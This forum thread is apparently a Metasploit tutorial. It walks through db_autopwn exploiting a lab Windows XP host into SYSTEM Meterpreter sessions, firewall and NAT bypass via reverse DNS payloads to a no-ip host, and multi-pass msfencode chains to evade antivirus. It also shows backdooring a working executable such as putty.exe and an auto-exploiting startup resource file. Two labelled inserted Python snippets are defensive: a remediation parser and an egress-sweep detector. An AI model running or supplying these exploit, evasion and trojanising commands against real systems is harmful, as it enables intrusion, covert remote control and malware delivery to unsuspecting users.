
Thread: My Metasploit tutorial thread

  1. #11
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    Code:
    msf > db_nmap -A 192.168.25.147
    
    Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-11-18 08:56 CST
    Nmap scan report for victim-30fe648f (192.168.25.147)
    Host is up (0.00074s latency).
    Not shown: 997 filtered ports
    PORT     STATE  SERVICE      VERSION
    139/tcp  open   netbios-ssn
    445/tcp  open   microsoft-ds Microsoft Windows XP microsoft-ds
    2869/tcp closed icslap
    MAC Address: 08:00:27:C1:63:8C (Cadmus Computer Systems)
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows XP SP3
    Network Distance: 1 hop
    Service Info: OS: Windows
    
    Host script results:
    |_nbstat: NetBIOS name: VICTIM-30FE648F, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:c1:63:8c (Cadmus Computer Systems)
    |_smbv2-enabled: Server doesn't support SMBv2 protocol
    | smb-os-discovery:  
    |   OS: Windows XP (Windows 2000 LAN Manager)
    |   Name: MSHOME\VICTIM-30FE648F
    |_  System time: 2010-11-18 08:56:26 UTC-8
    
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.74 ms victim-30fe648f (192.168.25.147)
    
    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 52.71 seconds
    Then, we check it, and maybe take a look at the open services.
    Code:
    msf > db_hosts -c address,mac,name,state,updated_at,svcs,vulns
    
    Hosts
    =====
    
    address         mac                name             state  updated_at               svcs  vulns
    -------         ---                ----             -----  ----------               ----  -----
    192.168.25.147  08:00:27:C1:63:8C  victim-30fe648f  alive  2010-11-18 15:34:25 UTC  3     0
    
    msf > db_services 
    
    Services
    ========
    
    created_at               info                                name          port  proto  state   updated_at               Host            Workspace
    ----------               ----                                ----          ----  -----  -----   ----------               ----            ---------
    2010-11-18 15:34:26 UTC                                      netbios-ssn   139   tcp    open    2010-11-18 15:34:26 UTC  192.168.25.147  default
    2010-11-18 15:34:26 UTC  Microsoft Windows XP microsoft-ds   microsoft-ds  445   tcp    open    2010-11-18 15:34:26 UTC  192.168.25.147  default
    2010-11-18 15:34:26 UTC                                      icslap        2869  tcp    closed  2010-11-18 15:34:26 UTC  192.168.25.147  default
    We'll go ahead and run our db_autopwn now.
    Code:
    msf > db_autopwn -h
    [*] Usage: db_autopwn [options]
    	-h          Display this help text
    	-t          Show all matching exploit modules
    	-x          Select modules based on vulnerability references
    	-p          Select modules based on open ports
    	-e          Launch exploits against all matched targets
    	-r          Use a reverse connect shell
    	-b          Use a bind shell on a random port (default)
    	-q          Disable exploit module output
    	-R  [rank]  Only run modules with a minimal rank
    	-I  [range] Only exploit hosts inside this range
    	-X  [range] Always exclude hosts inside this range
    	-PI [range] Only exploit hosts with these ports open
    	-PX [range] Always exclude hosts with these ports open
    	-m  [regex] Only run modules whose name matches the regex
    	-T  [secs]  Maximum runtime for any exploit in seconds
    
    msf > db_autopwn -p -r -e
    [*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...
    [*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:139...
    [*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:139...
    [*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...
    [*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:139...
    [*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...
    [*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:139...
    [*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:139...
    [*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:139...
    [*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:139...
    [*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:139...
    [*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:139...
    [*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:139...
    [*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:139...
    [*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:139...
    [*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:139...
    [*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:139...
    [*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:139...
    [*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:139...
    [*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:139...
    [*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:139...
    [*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:139...
    [*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:139...
    [*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:139...
    [*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:139...
    [*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:445...
    [*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:445...
    [*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:445...
    [*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:445...
    [*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:445...
    [*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:445...
    [*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:445...
    [*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:445...
    [*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:445...
    [*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.25.147:445...
    [*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.25.147:445...
    [*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.25.147:445...
    [*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.25.147:445...
    [*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.25.147:445...
    [*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.25.147:445...
    [*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.25.147:445...
    [*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.25.147:445...
    [*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.25.147:445...
    [*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.25.147:445...
    [*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.25.147:445...
    [*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.25.147:445...
    [*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.25.147:445...
    [*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.25.147:445...
    [*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.25.147:445...
    [*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.25.147:445...
    [*] (50/50 [0 sessions]): Waiting on 23 launched modules to finish execution...
    [*] (50/50 [1 sessions]): Waiting on 13 launched modules to finish execution...
    [*] Meterpreter session 1 opened (192.168.25.133:5503 -> 192.168.25.147:1034) at 2010-11-18 08:58:58 -0600
    [*] (50/50 [1 sessions]): Waiting on 12 launched modules to finish execution...
    [*] Meterpreter session 2 opened (192.168.25.133:23683 -> 192.168.25.147:1035) at 2010-11-18 08:59:02 -0600
    [*] (50/50 [2 sessions]): Waiting on 11 launched modules to finish execution...
    [*] (50/50 [2 sessions]): Waiting on 8 launched modules to finish execution...
    [*] Meterpreter session 4 opened (192.168.25.133:14963 -> 192.168.25.147:1038) at 2010-11-18 09:00:05 -0600
    [*] Meterpreter session 3 opened (192.168.25.133:8853 -> 192.168.25.147:1037) at 2010-11-18 09:00:05 -0600
    [*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 5 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 4 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 3 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 1 launched modules to finish execution...
    [*] (50/50 [4 sessions]): Waiting on 0 launched modules to finish execution...
    ..continued..

  2. #12
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    OK, now we've run our db_autopwn and managed to snag some sessions. Let's look at what hosts were exploited, and which exploits worked. I'm going to show a few methods to achieve this.
    Code:
    msf > db_vulns 
    [*] Time: 2010-11-18 15:57:36 UTC Vuln: host=192.168.25.147 name=exploit/windows/smb/ms08_067_netapi refs=CVE-2008-4250,OSVDB-49243,MSB-MS08-067,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
    [*] Time: 2010-11-18 15:58:05 UTC Vuln: host=192.168.25.147 name=exploit/windows/smb/ms10_061_spoolss refs=OSVDB-67988,CVE-2010-2729,MSB-MS10-061
    msf > db_exploited 
    [*]Time: 2010-11-18 15:57:38 UTC Host Info: host=192.168.25.147 port=139 proto=tcp sname=netbios-ssn exploit=exploit/windows/smb/ms08_067_netapi
    [*] Time: 2010-11-18 15:57:41 UTC Host Info: host=192.168.25.147 port=445 proto=tcp sname=microsoft-ds exploit=exploit/windows/smb/ms08_067_netapi
    [*] Time: 2010-11-18 15:58:05 UTC Host Info: host=192.168.25.147 port=445 proto=tcp sname=microsoft-ds exploit=exploit/windows/smb/ms10_061_spoolss
    [*] Time: 2010-11-18 15:58:06 UTC Host Info: host=192.168.25.147 port=139 proto=tcp sname=netbios-ssn exploit=exploit/windows/smb/ms10_061_spoolss
    [*] Found 4 exploited hosts.
    msf > sessions -v
    
    Active sessions
    ===============
    
      Id  Type                   Information                            Connection                                   Via
      --  ----                   -----------                            ----------                                   ---
      1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:11425 -> 192.168.25.147:1039  exploit/windows/smb/ms08_067_netapi
      2   meterpreter x86/win32                                         192.168.25.133:32002 -> 192.168.25.147:1040  exploit/windows/smb/ms08_067_netapi
      3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:15606 -> 192.168.25.147:1042  exploit/windows/smb/ms10_061_spoolss
      4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:11361 -> 192.168.25.147:1043  exploit/windows/smb/ms10_061_spoolss
    You should even be able to run scripts on multiple sessions with the following;
    in this example we'll use checkvm. I wasn't able to get all sessions to run some scripts, so I will not be including the output in this case. Perhaps a better idea would be to use setg with an InitialAutoRunScript setting.
    Code:
    msf > sessions -s checkvm all
    I think that should cover most of the basics for db_autopwn. It's quite handy and entertaining to mess around with. I also recommend checking out Rel1k's fast-track tool.

    I have recorded a short demo video of some commands and will be uploading shortly.

    EDIT:
    Here is my quick db_autopwn vid
    I am still working on optimal settings to use for the recordings and also my video editing skills. These are in real time so there might be a couple of points where you'd want to skip ahead a bit.
    Last edited by iproute; 11-18-2010 at 05:52 PM.
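
    Added example (not part of iproute's post and not Metasploit's own code): the db_vulns and db_exploited output above is easiest to act on when it is turned into a per-host list of the bulletins and CVEs that were actually exploited, and over which ports, which is what a remediation ticket needs. The sample input is the post's own output (the "[*]Time:" spacing quirk on one line is preserved and handled); the line format is assumed to be as shown in the post.

```python
"""Parse Metasploit db_vulns / db_exploited output into a per-host remediation summary."""
import re
from collections import defaultdict

# Sample lines copied from the post above (the "[*]Time:" spacing quirk is kept as-is).
DB_VULNS = """\
[*] Time: 2010-11-18 15:57:36 UTC Vuln: host=192.168.25.147 name=exploit/windows/smb/ms08_067_netapi refs=CVE-2008-4250,OSVDB-49243,MSB-MS08-067,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos
[*] Time: 2010-11-18 15:58:05 UTC Vuln: host=192.168.25.147 name=exploit/windows/smb/ms10_061_spoolss refs=OSVDB-67988,CVE-2010-2729,MSB-MS10-061
"""
DB_EXPLOITED = """\
[*]Time: 2010-11-18 15:57:38 UTC Host Info: host=192.168.25.147 port=139 proto=tcp sname=netbios-ssn exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: 2010-11-18 15:57:41 UTC Host Info: host=192.168.25.147 port=445 proto=tcp sname=microsoft-ds exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: 2010-11-18 15:58:05 UTC Host Info: host=192.168.25.147 port=445 proto=tcp sname=microsoft-ds exploit=exploit/windows/smb/ms10_061_spoolss
[*] Time: 2010-11-18 15:58:06 UTC Host Info: host=192.168.25.147 port=139 proto=tcp sname=netbios-ssn exploit=exploit/windows/smb/ms10_061_spoolss
[*] Found 4 exploited hosts.
"""

# Field layout assumed from the post's output; a different Metasploit version may differ.
VULN_RE = re.compile(r"Vuln: host=(?P<host>\S+) name=(?P<name>\S+) refs=(?P<refs>\S+)")
EXPL_RE = re.compile(
    r"Host Info: host=(?P<host>\S+) port=(?P<port>\d+) proto=(?P<proto>\w+) "
    r"sname=(?P<sname>\S+) exploit=(?P<name>\S+)"
)


def parse_vulns(text):
    """Return {(host, module): [refs, ...]} from db_vulns output."""
    out = {}
    for line in text.splitlines():
        m = VULN_RE.search(line)
        if m:
            out[(m["host"], m["name"])] = m["refs"].split(",")
    return out


def parse_exploited(text):
    """Return {(host, module): {ports}} from db_exploited output; the trailer line is ignored."""
    out = defaultdict(set)
    for line in text.splitlines():
        m = EXPL_RE.search(line)
        if m:
            out[(m["host"], m["name"])].add(int(m["port"]))
    return out


def remediation_summary(vulns_text, exploited_text):
    """Per host: Microsoft bulletins and CVEs that were actually exploited, plus the ports used."""
    vulns = parse_vulns(vulns_text)
    exploited = parse_exploited(exploited_text)
    summary = defaultdict(lambda: {"bulletins": set(), "cves": set(), "ports": set(), "modules": set()})
    for (host, module), ports in exploited.items():
        entry = summary[host]
        entry["modules"].add(module)
        entry["ports"] |= ports
        for ref in vulns.get((host, module), []):
            if ref.startswith("MSB-"):
                entry["bulletins"].add(ref[len("MSB-"):])
            elif ref.startswith("CVE-"):
                entry["cves"].add(ref)
    # Sorted lists make the result stable for reports and tests.
    return {h: {k: sorted(v) for k, v in e.items()} for h, e in summary.items()}


if __name__ == "__main__":
    for host, e in remediation_summary(DB_VULNS, DB_EXPLOITED).items():
        print(host, "missing patches:", ", ".join(e["bulletins"]),
              "| CVEs:", ", ".join(e["cves"]), "| exploited via ports:", e["ports"])
```

    Only references on modules that appear in db_exploited are counted, so a vuln that was recorded but never yielded a session does not show up as "exploited"; drop that filter if you want everything db_vulns knows about.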

  3. #13
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    One thing I believe needs to be mentioned that I neglected previously with db_autopwn: without first performing a vulnerability scan, such as with Nessus, db_autopwn running against matched ports will run far too many exploits that are not compatible with the platform/target.
    In the previous example we can see we are running Linux exploits against a Windows box.

    Code:
    msf > db_autopwn -p -r -e
    [*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.25.147:139...
    [*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.25.147:139...
    [*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.25.147:139...
    [*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.25.147:139...
    [*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.25.147:139...
    [*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.25.147:139...
    [*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.25.147:139...
    [*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.25.147:139...
    [*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.25.147:139...
    This can easily be remedied with the -m flag. -m uses regular expressions to narrow the list. Yes, we could import a Nessus scan, which is great, but the -m option is a solution that will take very little time.
    Code:
    msf > db_autopwn -p -r -e -m windows
    which results in 18 fewer unneeded exploits to run, making the process faster.
    Much nicer...
    Last edited by iproute; 11-29-2010 at 09:54 PM.

  4. #14
    Just burned his ISO
    Join Date
    Aug 2010
    Posts
    15

    Default Re: My Metasploit tutorial thread

    Quote Originally Posted by iproute View Post
    I'll give some info on my take on it in another post when I've got more time, but I'm definitely not an expert. Might be good to get in touch with vivek and find out if there are any further presentations planned. From elsewhere on the internet it looks like he is pretty good about responding.

    On another note, one of the things I feel I've missed above, links-wise, is
    IHS | Home of Johnny Long and Hackers for Charity, Inc
    Please at least take a look at some of the cool stuff Johnny Long is doing.
    About the firewall bypass, check out FWB++ at Megapanzer FWB++. Currently the binary just connects to the megapanzer RATs webpage, but since the source is provided we can change the link to our IP, I guess.

    Did anyone have any success by using meterpreter egress buster or reverse DNS?

  5. #15
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    Here is my take on firewall bypass. Again, I am no expert.

    For local firewall bypass (Windows firewall) I'd be assuming you're on the same subnet as the victim machine, but the local firewall is preventing bind_tcp payloads. Of course in this instance we would just use a reverse_tcp payload.

    For NAT traversal/bypass we can assume you would not be on the same subnet as the victim machine, in which case you might hope for open ports of some kind. If the victim machine is totally inaccessible through the NAT, then I might be thinking about using a social engineering attack with a reverse_tcp_dns payload, and point it back to myself with my no-ip hostname or some such. Granted, you would need some mechanism to deliver your crafted payload, such as email or SMS, and would also of course need to know WHERE to send it. Hopefully enough time has been spent on the information gathering/enumeration phase of the pentest.
    Or you could consider attacking the network equipment first. Suppose you could compromise the router first. Well, now you have the keys to the kingdom. Maybe modify the DHCP server so that it is handing out your IP as a DNS server, and direct people wherever we like. Some routers can set specific records for specific websites, such as 2wire equipment. Maybe the router is capable of a VPN setup that could place us on the same inside subnet as our victim machine (this is pivoting), and then all we'd have to deal with is the local firewall of the victim machine.

    Another thing to keep in mind in a corporate network scenario: there is often a proxy server limiting outbound traffic, making the reverse_tcp and/or reverse_tcp_dns payloads more difficult to utilize. The one at my work, for instance, limits everything except 80, 443, 22 and a few others, things that we would definitely be using in our jobs. Because of these common proxy configurations I like to set my reverse_tcp or reverse_tcp_dns payloads to 443 or another port that is commonly open for users.

    There is now a very interesting payload in the framework that might be very useful for this situation. I have never used it myself, however here is the info on it.
    Code:
    msf > info windows/meterpreter/reverse_tcp_allports 
    
           Name: Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
        Version: 10394, 8998, 8984
       Platform: Windows
           Arch: x86
    Needs Admin: No
     Total size: 294
           Rank: Normal
    
    Provided by:
      skape <mmiller@hick.org>
      sf <stephen_fewer@harmonysecurity.com>
      hdm <hdm@metasploit.com>
    
    Basic options:
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LHOST                      yes       The listen address
    LPORT     1                yes       The starting port number to connect back on
    
    Description:
      Try to connect back to the attacker, on all possible ports (1-65535, 
      slowly), Inject the meterpreter server DLL via the Reflective Dll 
      Injection payload (staged)
    Regarding A/V bypass, I strongly recommend that interested parties do some reading on this forum. There is a lot of information just in the HowTo section here. Of course we'll need to use encoding. Encoding can be set inside of the exploit module, or if you are generating a payload with msfpayload, you can pipe it through msfencode, even multiple times like this:
    Code:
    root@bt4:~# msfpayload windows/meterpreter/reverse_tcp_dns LHOST=my.no-ip-hostname.com LPORT=443 R | msfencode -e x86/fnstenv_mov -c 2 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/call4_dword_xor -c 1 -t raw | msfencode -t raw | msfencode -e x86/shikata_ga_nai -c 4 -t exe > /root/payload.exe
    Don't forget you can use/backdoor an existing exe (some will not work; experimentation is key) as a template with -x. You can even keep the template working with -k, so when they run the payload exe, their expected program starts up just fine. Remember to use the -o option with these for your output file rather than redirecting the output. You can also set things up with
    Code:
    root@bt4:~# msfpayload windows/meterpreter/reverse_tcp_dns LHOST=my.no-ip-hostname.com LPORT=443 EXITFUNC=thread R | msfenco......etc...
    which will keep your meterpreter/payload process alive even when they close the backdoored executable.

    There is also more than one way to generate payloads. You can do so within the framework. Here is how:
    Code:
    msf > use windows/meterpreter/reverse_tcp_dns
    msf payload(reverse_tcp_dns) > set lhost your-noip-hostname.com
    lhost => your-noip-hostname.com
    msf payload(reverse_tcp_dns) > set lport 443
    lport => 443
    msf payload(reverse_tcp_dns) > set exitfunc thread
    exitfunc => thread
    msf payload(reverse_tcp_dns) > generate -h
    Usage: generate [options]
    
    Generates a payload.
    
    OPTIONS:
    
        -E        Force encoding.
        -b <opt>  The list of characters to avoid: '\x00\xff'
        -e <opt>  The name of the encoder module to use.
        -f <opt>  The output file name (otherwise stdout)
        -h        Help banner.
        -i <opt>  the number of encoding iterations.
        -k        Keep the template executable functional
        -o <opt>  A comma separated list of options in VAR=VAL format.
        -p <opt>  The Platform for output.
        -s <opt>  NOP sled length.
        -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
        -x <opt>  The executable template to use
    
    msf payload(reverse_tcp_dns) > generate -e x86/shikata_ga_nai -i 3 -t exe -x /root/putty.exe -k -f /root/payload.exe
    If you do not use the -t option it will generate shellcode by default. Bear in mind, staged payloads such as meterpreter will output shellcode for both stages.
    Last edited by iproute; 12-07-2010 at 10:29 PM.
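
    Added example (not from iproute's post and not Metasploit code), from the defender's side of the reverse_tcp_allports description above: a stager that walks the destination ports from 1 upward against a single external address leaves a very recognisable trail in firewall deny logs, namely one internal source hitting one destination on a long run of consecutive ports. The detection below runs over constructed deny-log lines (the format and the addresses are made up for this example, and the sweep is compressed into seconds rather than the "slowly" the payload description mentions) and does not alert on ordinary scattered denies.

```python
"""Detect an all-ports reverse-connect sweep (one internal host trying many consecutive
destination ports on one external host) in firewall deny logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not a real capture). Host 10.0.5.23 sweeps ports 1..40
# against 203.0.113.9, one per second; host 10.0.5.40 has a few unrelated denies.
SAMPLE_LOG = [
    f"2010-12-07T10:00:{i:02d} DENY src=10.0.5.23 dst=203.0.113.9 dport={i + 1} proto=tcp"
    for i in range(40)
] + [
    "2010-12-07T10:00:05 DENY src=10.0.5.40 dst=198.51.100.7 dport=25 proto=tcp",
    "2010-12-07T10:00:09 DENY src=10.0.5.40 dst=198.51.100.7 dport=8080 proto=tcp",
    "2010-12-07T10:00:30 DENY src=10.0.5.40 dst=198.51.100.7 dport=25 proto=tcp",
]

# Assumed line layout for this example; adapt the pattern to your firewall's format.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+)$"
)


def parse_events(lines):
    """Yield parsed DENY events; lines that do not match the expected format are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if m and m["action"] == "DENY":
            yield {
                "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S"),
                "src": m["src"],
                "dst": m["dst"],
                "dport": int(m["dport"]),
            }


def longest_consecutive_run(ports):
    """Length of the longest run n, n+1, n+2, ... in an ascending list of distinct ports."""
    best = run = 1 if ports else 0
    for prev, cur in zip(ports, ports[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def detect_port_sweeps(lines, window=timedelta(minutes=5), min_ports=20, min_run=10):
    """Return one alert per (src, dst) pair that, within any `window`, was denied on at
    least `min_ports` distinct destination ports including a run of `min_run` consecutive ones."""
    by_pair = defaultdict(list)
    for ev in parse_events(lines):
        by_pair[(ev["src"], ev["dst"])].append(ev)

    alerts = []
    for (src, dst), evs in by_pair.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until the events fit inside `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            ports = sorted({e["dport"] for e in evs[start:end + 1]})
            if len(ports) >= min_ports and longest_consecutive_run(ports) >= min_run:
                all_ports = sorted({e["dport"] for e in evs})
                alerts.append({
                    "src": src,
                    "dst": dst,
                    "distinct_ports": len(all_ports),
                    "longest_run": longest_consecutive_run(all_ports),
                    "first": evs[0]["ts"],
                    "last": evs[-1]["ts"],
                })
                break  # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for a in detect_port_sweeps(SAMPLE_LOG):
        print(f"egress port sweep: {a['src']} -> {a['dst']} ({a['distinct_ports']} ports, "
              f"longest consecutive run {a['longest_run']}, {a['first']} .. {a['last']})")
```

    The consecutive-run test is what separates this stager's behaviour from a host that simply talks to many services on one address; the thresholds and the window are knobs you tune to your own deny-log volume, and a real sweep at the payload's "slow" pace needs a correspondingly longer window.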

  6. #16
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    Here I'm going to mention resource files briefly. Specifically I would like to address the default resource file. I will demonstrate regular resource file usage when I have more time, but here is a cool bit.

    Using the default msf resource file you can set certain commands to run on console startup. Perhaps we would like to have our postgres database autoconnect when we start things up.

    Code:
    root@bt:~# nano .msf3/msfconsole.rc
    Go ahead and enter the commands you would like to run on startup. You can even do things like calling other resource files.
    Code:
    db_connect postgres:password@127.0.0.1/metasploit
    db_status
    Then when starting the framework it should look something like this:
    Code:
    root@bt:~# msfconsole
    
                    _                  _       _ _
                   | |                | |     (_) |
     _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
    | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
    | | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
    |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                                | |
                                |_|
    
    
           =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
    + -- --=[ 633 exploits - 312 auxiliary
    + -- --=[ 215 payloads - 27 encoders - 8 nops
           =[ svn r11229 updated today (2010.12.05)
    
    resource (/root/.msf3/msfconsole.rc)> db_connect postgres:password@127.0.0.1/metasploit
    resource (/root/.msf3/msfconsole.rc)> db_status
    [*] postgresql connected to metasploit
    msf >
    Here I will show making msfconsole into an instant shell. We will call a resource file from the default msfconsole.rc file.
    This is a resource file I made with the makerc command in the framework.
    Code:
    root@bt:~# cat spoolss.rc
    use windows/smb/ms10_061_spoolss
    set rhost 192.168.25.147
    set payload windows/shell/reverse_tcp
    set lhost 192.168.25.106
    set lport 5566
    exploit
    And here is what I added to my msfconsole.rc file
    Code:
    root@bt:~# cat .msf3/msfconsole.rc
    db_connect postgres:severus@127.0.0.1/metasploit
    db_status
    resource spoolss.rc
    which results in
    Code:
    root@bt:~# msfconsole
    
                     o                       8         o   o
                     8                       8             8
    ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
    8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
    8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
    8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
    ..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
    ::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    
    
           =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
    + -- --=[ 633 exploits - 312 auxiliary
    + -- --=[ 215 payloads - 27 encoders - 8 nops
           =[ svn r11229 updated today (2010.12.05)
    
    resource (/root/.msf3/msfconsole.rc)> db_connect postgres:severus@127.0.0.1/metasploit
    resource (/root/.msf3/msfconsole.rc)> db_status
    [*] postgresql connected to metasploit
    resource (/root/.msf3/msfconsole.rc)> resource spoolss.rc
    resource (spoolss.rc)> use windows/smb/ms10_061_spoolss
    resource (spoolss.rc)> set rhost 192.168.25.147
    rhost => 192.168.25.147
    resource (spoolss.rc)> set payload windows/shell/reverse_tcp
    payload => windows/shell/reverse_tcp
    resource (spoolss.rc)> set lhost 192.168.25.106
    lhost => 192.168.25.106
    resource (spoolss.rc)> set lport 5566
    lport => 5566
    resource (spoolss.rc)> exploit
    [*] Started reverse handler on 192.168.25.106:5566
    [*] Trying target Windows Universal...
